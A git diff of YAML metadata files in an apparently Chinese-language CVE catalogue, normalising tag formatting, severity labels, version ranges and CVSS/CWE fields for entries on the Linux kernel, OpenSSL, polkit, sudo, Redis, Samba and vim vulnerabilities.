@@ -1,18 +1,21 @@ -id: CVE-2022-36946 -source: https://github.com/Pwnzer0tt1/CVE-2022-36946 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 - description: | - Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 - scope-of-influence: - 5.18.14 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 - - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2022-36946 - tags: 拒绝服务,cve2022 \ No newline at end of file +id: CVE-2022-36946 +source: https://github.com/Pwnzer0tt1/CVE-2022-36946 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: High + description: | + Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 + scope-of-influence: + Linux-Kernel = 5.18.14 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2022-36946 + cwe-id: None + cnvd-id: None + kve-id: None + tags: 拒绝服务, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml index e55940934eafd458fb9be053f0e8a5fb97569abd..a7ecbb14b73099e34fbedbc7cddc4ede7512905a 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-41218.yaml 
@@ -6,11 +6,11 @@ info: description: | 在5.19.10之前的Linux内核中的drivers/media/dvb-core/dmxdev.c中,存在由refcount竞争导致的释放后使用,影响dvb_demux_open和dvb_dmxdev_release。 scope-of-influence: - Linux内核5.19.10之前的所有版本 + Linux-Kernel < 5.19.10 reference: - https://nvd.nist.gov/vuln/detail/cve-2022-41218 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H cvss-score: 5.5 cve-id: CVE-2022-41218 cwe-id: CWE-416 diff --git a/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml b/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml index 0779d866b767349924a1850b27bca898031b6fee..b4a6237a8d5635968b359a1613d9b3dc5963d17d 100644 --- a/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml +++ b/cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml @@ -2,17 +2,18 @@ id: CVE-2023-0045 source: https://github.com/es0j/CVE-2023-0045 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 超危 + severity: High description: Linux kernel存在安全漏洞,该漏洞源于绕过Spectre-BTI用户空间缓解措施。基于linux操作系统的Intel、AMD和 Arm 等现代处理器,被发现存在一个漏洞,攻击者可以绕过现有硬件防护缓解措施,实施Spectre BTI推测执行攻击,从而访问内存数据,可能引起信息泄漏。用于推测控制的prctl系统调用的当前实现未能保护用户免受在缓解之前执行的攻击者的攻击。seccomp缓解在此场景中也失败了。 scope-of-influence: - 5.5~5.15 + 5.5 ≤ Linux-Kernel ≤ 5.15 reference: - - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2023-0179 - - https://docs.kernel.org/userspace-api/spec_ctrl.html - - https://elixir.bootlin.com/linux/v5.15.56/source/arch/x86/kernel/cpu/bugs.c#L1467 + - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2023-0045 + - https://nvd.nist.gov/vuln/detail/CVE-2023-0045 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2023-0045 - cwe-id: - tags: 推测攻击,信息泄露,cve2023 \ No newline at end of file + cwe-id: CWE-610 + cnvd-id: None + kve-id: None + tags: 推测攻击, 信息泄露, cve2023 \ No newline at end of file 
diff --git a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml index 74ca113bb0cb1849ee5b28fd2b0ce967274569d1..33387ea2e297dc983df7c75f092765abe465c946 100644 --- a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml +++ b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml @@ -19,5 +19,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2023-0179 - cnvd-id: NONE - tags: 缓冲区溢出,cve2023 \ No newline at end of file + cwe-id: CWE-190 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出, cve2023 \ No newline at end of file diff --git a/cve/openssl/2016/yaml/CVE-2016-2107.yaml b/cve/openssl/2016/yaml/CVE-2016-2107.yaml index 0d605e2471087c699686dec804b634c46cfa8f7c..b231edef03b7dffa1a591afb29d4724c1ba6df21 100644 --- a/cve/openssl/2016/yaml/CVE-2016-2107.yaml +++ b/cve/openssl/2016/yaml/CVE-2016-2107.yaml @@ -1,6 +1,5 @@ id: CVE-2016-2107 -source: - https://github.com/FiloSottile/CVE-2016-2107 +source: https://github.com/FiloSottile/CVE-2016-2107 info: name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 severity: medium diff --git a/cve/openssl/2021/yaml/CVE-2021-3449.yaml b/cve/openssl/2021/yaml/CVE-2021-3449.yaml index 5e064af31b089ae7dd507fb0981953c183676bf3..cd047c804a2ac82588d7f02148df457d62f17c55 100644 --- a/cve/openssl/2021/yaml/CVE-2021-3449.yaml +++ b/cve/openssl/2021/yaml/CVE-2021-3449.yaml @@ -1,6 +1,5 @@ id: CVE-2021-3449 -source: - https://github.com/terorie/cve-2021-3449 +source: https://github.com/terorie/cve-2021-3449 info: name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 severity: medium diff --git a/cve/openssl/2022/yaml/CVE-2022-0778.yaml b/cve/openssl/2022/yaml/CVE-2022-0778.yaml index b571f37cd324800e25bed4ca326626b6313d28bc..9f209b49ab23f23af0622fa7aa6c5c175afa5faf 100644 --- a/cve/openssl/2022/yaml/CVE-2022-0778.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-0778.yaml 
@@ -4,11 +4,12 @@ info: name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 severity: High description: 漏洞出自BN_mod_sqrt()接口函数,它用于计算模平方根,且期望参数p应该是个质数,但是函数内并没有进行检查,这导致内部可能出现无限循环。 - scope-of-influence: Openssl 1.0.2, 1.1.1 和 3.0 版本 + scope-of-influence: + Openssl 1.0.2, 1.1.1 和 3.0 版本 reference: - https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2022-0778 cwe-id: CWE-835 diff --git a/cve/openssl/2022/yaml/CVE-2022-2274.yaml b/cve/openssl/2022/yaml/CVE-2022-2274.yaml index 5e366ebe4d4f3bc0545b81763e37af1d4e8a3b5e..973b492c3fc45167b2da32669b6ff264781fb897 100644 --- a/cve/openssl/2022/yaml/CVE-2022-2274.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-2274.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-787 cnvd-id: None kve-id: None - tags: 拒绝服务,DoS,cve2022,RCE,远程代码执行 \ No newline at end of file + tags: 拒绝服务, DoS, cve2022, RCE, 远程代码执行 \ No newline at end of file diff --git a/cve/openssl/2022/yaml/CVE-2022-3602.yaml b/cve/openssl/2022/yaml/CVE-2022-3602.yaml index 90d08abac7afc118849ac465e875ece9feee193f..73bcf17581a330376d3979f3969ac6266cf93db3 100644 --- a/cve/openssl/2022/yaml/CVE-2022-3602.yaml +++ b/cve/openssl/2022/yaml/CVE-2022-3602.yaml @@ -24,4 +24,4 @@ info: cwe-id: CWE-120 cnvd-id: None kve-id: None - tags: 缓存溢出,BOF,拒绝服务,DoS,cve2022,RCE,远程代码执行 \ No newline at end of file + tags: 缓存溢出, BOF, 拒绝服务, DoS, cve2022, RCE, 远程代码执行 \ No newline at end of file diff --git a/cve/openssl/2023/yaml/CVE-2023-25136.yaml b/cve/openssl/2023/yaml/CVE-2023-25136.yaml index 6879369c56f73dec52a6110fe3693e18d2fe0d91..ef5b23372ee25a83018adc5adc2465306877098f 100644 --- a/cve/openssl/2023/yaml/CVE-2023-25136.yaml +++ b/cve/openssl/2023/yaml/CVE-2023-25136.yaml 
@@ -18,4 +18,4 @@ info: cwe-id: CWE-415 cnvd-id: None kve-id: None - tags: 拒绝服务,DoS \ No newline at end of file + tags: 拒绝服务, DoS \ No newline at end of file diff --git a/cve/polkit/2021/yaml/CVE-2021-3560.yaml b/cve/polkit/2021/yaml/CVE-2021-3560.yaml index d378eb64af9819bc466d13f47b1f5a1465a3fcbe..e0ad57ec0b0c15bb560f67fd4fdcb050b3a18659 100644 --- a/cve/polkit/2021/yaml/CVE-2021-3560.yaml +++ b/cve/polkit/2021/yaml/CVE-2021-3560.yaml @@ -6,7 +6,7 @@ info: description: | 发现polkit可能被欺骗,绕过D-Bus请求的凭据检查,将请求者的权限提升到root用户。 scope-of-influence: - 0.105 ≥ policykit ≥ 0.113 + 0.105 ≤ policykit ≤ 0.113 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3560 - https://ubuntu.com/security/CVE-2021-3560 @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-3560 - cwe-id: CWE-754,CWE-863 + cwe-id: CWE-754, CWE-863 cnvd-id: None kve-id: None - tags: cve2021,权限提升 \ No newline at end of file + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/polkit/2021/yaml/CVE-2021-4034.yaml b/cve/polkit/2021/yaml/CVE-2021-4034.yaml index 9322d0459429d0fc4118deb39f831d297ea21a2b..9cbe6b9a4d6a4058d44b45e672e6cef4c8fe5ac2 100644 --- a/cve/polkit/2021/yaml/CVE-2021-4034.yaml +++ b/cve/polkit/2021/yaml/CVE-2021-4034.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-4034 - cwe-id: CWE-787,CWE-125 + cwe-id: CWE-787, CWE-125 cnvd-id: None kve-id: None - tags: cve2021,权限提升 \ No newline at end of file + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/python/2022/yaml/CVE-2022-30286.yaml b/cve/python/2022/yaml/CVE-2022-30286.yaml index 613b500754c4f138a4a7b16d780e36ff81d5d896..c76e9e0720d667828a31bbbde04332b7d8b402c7 100644 --- a/cve/python/2022/yaml/CVE-2022-30286.yaml +++ b/cve/python/2022/yaml/CVE-2022-30286.yaml 
@@ -20,5 +20,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: - - Source Codes Read \ No newline at end of file + tags: Source Codes Read \ No newline at end of file diff --git a/cve/python/2022/yaml/CVE-2022-35411.yaml b/cve/python/2022/yaml/CVE-2022-35411.yaml index 3e14c1845a5b10663053b181af3d4ab6fcab2b4e..3ac5318159648389b925686432f584802726bb42 100644 --- a/cve/python/2022/yaml/CVE-2022-35411.yaml +++ b/cve/python/2022/yaml/CVE-2022-35411.yaml @@ -18,5 +18,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: - - 远程代码执行 + tags: 远程代码执行 diff --git a/cve/redis/2022/yaml/CVE-2022-0543.yaml b/cve/redis/2022/yaml/CVE-2022-0543.yaml index 7a93478e1747dad11c6b8523b8c8d811c2633258..15056d48a0e02d5884fa87f8e516bc7bedaff112 100644 --- a/cve/redis/2022/yaml/CVE-2022-0543.yaml +++ b/cve/redis/2022/yaml/CVE-2022-0543.yaml @@ -1,6 +1,5 @@ id: CVE-2022-0543 -source: - https://github.com/aodsec/CVE-2022-0543 +source: https://github.com/aodsec/CVE-2022-0543 info: name: Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 severity: critical @@ -20,4 +19,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: cve2022,redis,RCE \ No newline at end of file + tags: cve2022, redis, RCE \ No newline at end of file diff --git a/cve/redis/2022/yaml/CVE-2022-31144.yaml b/cve/redis/2022/yaml/CVE-2022-31144.yaml index 7b5dcafb09241e93300148bc8eebd76245c3bdd1..13ff43a8e30f466b1700f2f21fba7bbf9caeff62 100644 --- a/cve/redis/2022/yaml/CVE-2022-31144.yaml +++ b/cve/redis/2022/yaml/CVE-2022-31144.yaml @@ -1,6 +1,5 @@ id: CVE-2022-31144 -source: - https://github.com/SpiralBL0CK/CVE-2022-31144 +source: https://github.com/SpiralBL0CK/CVE-2022-31144 info: name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力. severity: High diff --git a/cve/samba/2021/yaml/CVE-2021-44142.yaml b/cve/samba/2021/yaml/CVE-2021-44142.yaml index bcce0569a61c3a2833837e8d508a4e104e3d70c5..f6160dc9829b81b339e26a122f37f6ac977e1ba5 100644 --- a/cve/samba/2021/yaml/CVE-2021-44142.yaml 
+++ b/cve/samba/2021/yaml/CVE-2021-44142.yaml @@ -1,6 +1,5 @@ id: CVE-2021-44142 -source: - https://github.com/horizon3ai/CVE-2021-44142 +source: https://github.com/horizon3ai/CVE-2021-44142 info: name: Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。 severity: high @@ -20,4 +19,4 @@ info: cwe-id: CWE-125,CWE-787 cnvd-id: None kve-id: None - tags: cve2021,samba,RCE \ No newline at end of file + tags: cve2021, samba, RCE \ No newline at end of file diff --git a/cve/sudo/2021/yaml/CVE-2021-3156.yaml b/cve/sudo/2021/yaml/CVE-2021-3156.yaml index 5782b43067351fdb186e305dc72697488ff67639..760104ccc7745304ea7648969d5d0cc558e77a02 100644 --- a/cve/sudo/2021/yaml/CVE-2021-3156.yaml +++ b/cve/sudo/2021/yaml/CVE-2021-3156.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-193 cnvd-id: None kve-id: None - tags: 堆缓冲区溢出漏洞,cve2021,权限提升 \ No newline at end of file + tags: 堆缓冲区溢出漏洞, cve2021, 权限提升 \ No newline at end of file diff --git a/cve/sudo/2023/yaml/CVE-2023-22809.yaml b/cve/sudo/2023/yaml/CVE-2023-22809.yaml index 8fad732065c69fbaf8d90d4aa442ae726ecbd7c2..66b6045a82c2ab26c5cc97c38e34d538f71322b7 100644 --- a/cve/sudo/2023/yaml/CVE-2023-22809.yaml +++ b/cve/sudo/2023/yaml/CVE-2023-22809.yaml 
@@ -1,20 +1,19 @@ id: CVE-2023-22809 source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc info: - name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 - severity: high - description: - Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 - scope-of-influence: - sudo@[1.8.0, 1.9.12p2) - references: - - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2023-22809 - cwe-id: CWE-269 - cnvd-id: None - kve-id: None - tags: - - 特权管理不当 \ No newline at end of file + name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 + severity: high + description: + Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 + scope-of-influence: + sudo@[1.8.0, 1.9.12p2) + references: + - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-22809 + cwe-id: CWE-269 + cnvd-id: None + kve-id: None + tags: 特权管理不当 \ No newline at end of file diff --git a/cve/vim/2021/yaml/CVE-2021-3778.yaml b/cve/vim/2021/yaml/CVE-2021-3778.yaml index a009ea6b6928d8ffc4d92ad40c52ee8e141c520a..e99dcced77673670d40eba48e743d218df82ba96 100644 --- a/cve/vim/2021/yaml/CVE-2021-3778.yaml +++ b/cve/vim/2021/yaml/CVE-2021-3778.yaml @@ -2,8 +2,7 @@ id: CVE-2021-3778 source: https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/ info: name: vim: Heap-based Buffer Overflow in ex_retab() - severity: - HIGH + severity: HIGH description: | vim容易受到基于堆的缓冲区溢出的攻击 scope-of-influence: diff --git a/cve/vim/2022/yaml/CVE-2022-0351.yaml b/cve/vim/2022/yaml/CVE-2022-0351.yaml index 151afb15b1d2a449b3caef6df286e9da64dd68fb..a7dab599db3816d7542d01e5a5c957ccfa97da7b 100644 
--- a/cve/vim/2022/yaml/CVE-2022-0351.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0351.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0351 - cwe-id: CWE-119,CWE-786 + cwe-id: CWE-119, CWE-786 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误,拒绝服务 \ No newline at end of file + tags: cve2022, 缓冲区错误, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0359.yaml b/cve/vim/2022/yaml/CVE-2022-0359.yaml index 63ba211001dc9173e3a41d950b49233f2913d6dc..2bab72a5c945fca0a8864f534e577870374a4e1f 100644 --- a/cve/vim/2022/yaml/CVE-2022-0359.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0359.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0359 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: 缓冲区溢出,cve2022 \ No newline at end of file + tags: 缓冲区溢出, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0413.yaml b/cve/vim/2022/yaml/CVE-2022-0413.yaml index 6768e9a9941d0463206adeae3d6dda88a3208982..e4ba32a11cd6f1324da75c529d6d92e920a6de9c 100644 --- a/cve/vim/2022/yaml/CVE-2022-0413.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0413.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-416 cnvd-id: None kve-id: None - tags: cve2022,资源管理错误,拒绝服务 \ No newline at end of file + tags: cve2022, 资源管理错误, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0417.yaml b/cve/vim/2022/yaml/CVE-2022-0417.yaml index 30adb1b706450e3f12fa96b46a13062ae2e4bbb8..ea15ffe17ef37eb8b94601c89391451fbe430039 100644 --- a/cve/vim/2022/yaml/CVE-2022-0417.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0417.yaml 
@@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0417 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: 崩溃,代码执行,cve2022 \ No newline at end of file + tags: 崩溃, 代码执行, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0572.yaml b/cve/vim/2022/yaml/CVE-2022-0572.yaml index 3c4f1c9ee5a3784b8feb4ba751c8c6184a5d194a..be2a63876728db00f2b05441db99a0b69ff4f7d0 100644 --- a/cve/vim/2022/yaml/CVE-2022-0572.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0572.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0572 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: 缓冲区错误,cve2022 \ No newline at end of file + tags: 缓冲区错误, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0629.yaml b/cve/vim/2022/yaml/CVE-2022-0629.yaml index 3802cc7d17111b99b5dfc0f0d47736bffc7fe8ac..a06f09e802c4e5a8120795731161265315c67107 100644 --- a/cve/vim/2022/yaml/CVE-2022-0629.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0629.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0629 - cwe-id: CWE-787,CWE-121 + cwe-id: CWE-787, CWE-121 cnvd-id: None kve-id: None - tags: 缓冲区溢出,cve2022 \ No newline at end of file + tags: 缓冲区溢出, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0685.yaml b/cve/vim/2022/yaml/CVE-2022-0685.yaml index b04e2848da565885f4d0df16956b65f9e9dd88ec..3dda6837ff797a66369a55b164a50a59f7982bb1 100644 --- a/cve/vim/2022/yaml/CVE-2022-0685.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0685.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-823 cnvd-id: None kve-id: None - tags: cve2022,拒绝服务 \ No newline at end of file + tags: cve2022, 拒绝服务 \ No newline at end of file 
diff --git a/cve/vim/2022/yaml/CVE-2022-0714.yaml b/cve/vim/2022/yaml/CVE-2022-0714.yaml index b9f11b5fb02f6d77e153757919e621fef4ccc495..8c7ea56f2f64f74567462095c47516804e38fe60 100644 --- a/cve/vim/2022/yaml/CVE-2022-0714.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0714.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H cvss-score: 5.5 cve-id: CVE-2022-0714 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误 \ No newline at end of file + tags: cve2022, 缓冲区错误 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0729.yaml b/cve/vim/2022/yaml/CVE-2022-0729.yaml index e55f8edc1349c57da9e5517e30d573006b747be3..6b6c5a0cf6f92ecd0c1e47102d899e268fc763b4 100644 --- a/cve/vim/2022/yaml/CVE-2022-0729.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0729.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0729 - cwe-id: CWE-119,CWE-823 + cwe-id: CWE-119, CWE-823 cnvd-id: None kve-id: None - tags: 缓冲区溢出,cve2022 \ No newline at end of file + tags: 缓冲区溢出, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-1771.yaml b/cve/vim/2022/yaml/CVE-2022-1771.yaml index a82ca61e6a59816b0de4ecd0aea494902c607fa4..b5bfc8733ab1f691f7416c0099d3eb908193c17f 100644 --- a/cve/vim/2022/yaml/CVE-2022-1771.yaml +++ b/cve/vim/2022/yaml/CVE-2022-1771.yaml @@ -11,9 +11,9 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-1771 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H - cvss-score: 漏洞评分 + cvss-score: 5.5 cve-id: CVE-2022-1771 cwe-id: CWE-674 cnvd-id: None kve-id: None - tags: cve2022,缓冲区溢出 \ No newline at end of file + tags: cve2022, 缓冲区溢出 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2206.yaml b/cve/vim/2022/yaml/CVE-2022-2206.yaml index 47f8d6b0afe8a988ba8568efe0766a0825213034..387d0d77d84cec4f6236510f0f7a06e5060a4109 100644 --- a/cve/vim/2022/yaml/CVE-2022-2206.yaml 
+++ b/cve/vim/2022/yaml/CVE-2022-2206.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-125 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误 \ No newline at end of file + tags: cve2022, 缓冲区错误 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2257.yaml b/cve/vim/2022/yaml/CVE-2022-2257.yaml index 7b71e39ad9ba88668bff9c2457174792714a86b9..7e823bc2c5cab47871f2fe162fcadee553f17230 100644 --- a/cve/vim/2022/yaml/CVE-2022-2257.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2257.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-125 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误 \ No newline at end of file + tags: cve2022, 缓冲区错误 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2264.yaml b/cve/vim/2022/yaml/CVE-2022-2264.yaml index 9df97e7af1f079e4c07b69b7e6d9d5872d0f9de8..0c326cacaca17681f8ddbbf7315ef3f9d30c2aa5 100644 --- a/cve/vim/2022/yaml/CVE-2022-2264.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2264.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-122 cnvd-id: None kve-id: None - tags: cve2022,缓冲区溢出 \ No newline at end of file + tags: cve2022, 缓冲区溢出 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2598.yaml b/cve/vim/2022/yaml/CVE-2022-2598.yaml index 93a97db39991e17e2b969886ba593746e78dcccd..cdd674e8e539afb48ddf477736a60be4bde32bf7 100644 --- a/cve/vim/2022/yaml/CVE-2022-2598.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2598.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-475 cnvd-id: None kve-id: None - tags: cve2022,拒绝服务 \ No newline at end of file + tags: cve2022, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-1127.yaml b/cve/vim/2023/yaml/CVE-2023-1127.yaml index cd88a16b50cef9d434f59218966e7737df1a1fe5..cb16afedb71a54d6e09250c1278369e188c8841c 100644 --- a/cve/vim/2023/yaml/CVE-2023-1127.yaml +++ b/cve/vim/2023/yaml/CVE-2023-1127.yaml @@ -4,7 +4,7 @@ info: name: Vim是一款基于UNIX平台的编辑器。 severity: high description: | - GitHub存储库vim/vim在9.0.1367版本存在除以零漏洞。 + vim在9.0.1367版本存在除以零漏洞。 scope-of-influence: vim < 9.0.1367 reference: 
